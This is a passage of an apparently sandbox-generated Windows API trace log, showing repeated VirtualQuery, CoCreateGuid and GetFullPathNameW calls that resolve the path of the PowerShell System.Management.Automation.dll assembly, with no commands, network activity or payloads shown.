	[0349.124] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.124] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.125] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.125] VirtualQuery (in: lpAddress=0xab8e0, lpBuffer=0xac7a0, dwLength=0x30 | out: lpBuffer=0xac7a0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.125] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.125] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.125] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.125] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.125] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x4602824c, Data2=0x4e3b, Data3=0x4c5b, Data4=([0]=0x8a, [1]=0x4, [2]=0xb4, [3]=0x3c, [4]=0x5a, [5]=0x6a, [6]=0xa2, [7]=0x5f))) returned 0x0
	[0349.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.129] VirtualQuery (in: lpAddress=0xab4a0, lpBuffer=0xac360, dwLength=0x30 | out: lpBuffer=0xac360*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.129] VirtualQuery (in: lpAddress=0xab530, lpBuffer=0xac3f0, dwLength=0x30 | out: lpBuffer=0xac3f0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.129] VirtualQuery (in: lpAddress=0xab750, lpBuffer=0xac610, dwLength=0x30 | out: lpBuffer=0xac610*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.130] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x9485870b, Data2=0xb125, Data3=0x4e1c, Data4=([0]=0x9a, [1]=0x1e, [2]=0xff, [3]=0x32, [4]=0x8d, [5]=0x77, [6]=0xdb, [7]=0x1e))) returned 0x0
	[0349.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.369] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x8a1ef2c6, Data2=0x845e, Data3=0x42f9, Data4=([0]=0x96, [1]=0x26, [2]=0x25, [3]=0x4e, [4]=0xe8, [5]=0x1f, [6]=0xb2, [7]=0x82))) returned 0x0
	[0349.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.370] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x8970b119, Data2=0xfeee, Data3=0x4653, Data4=([0]=0xbe, [1]=0x71, [2]=0x9f, [3]=0xc4, [4]=0x51, [5]=0xeb, [6]=0x51, [7]=0x4b))) returned 0x0
	[0349.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.370] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xb5472884, Data2=0x8d20, Data3=0x4ae4, Data4=([0]=0xaf, [1]=0x2, [2]=0x85, [3]=0xb4, [4]=0xc3, [5]=0xc7, [6]=0xbc, [7]=0x78))) returned 0x0
	[0349.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
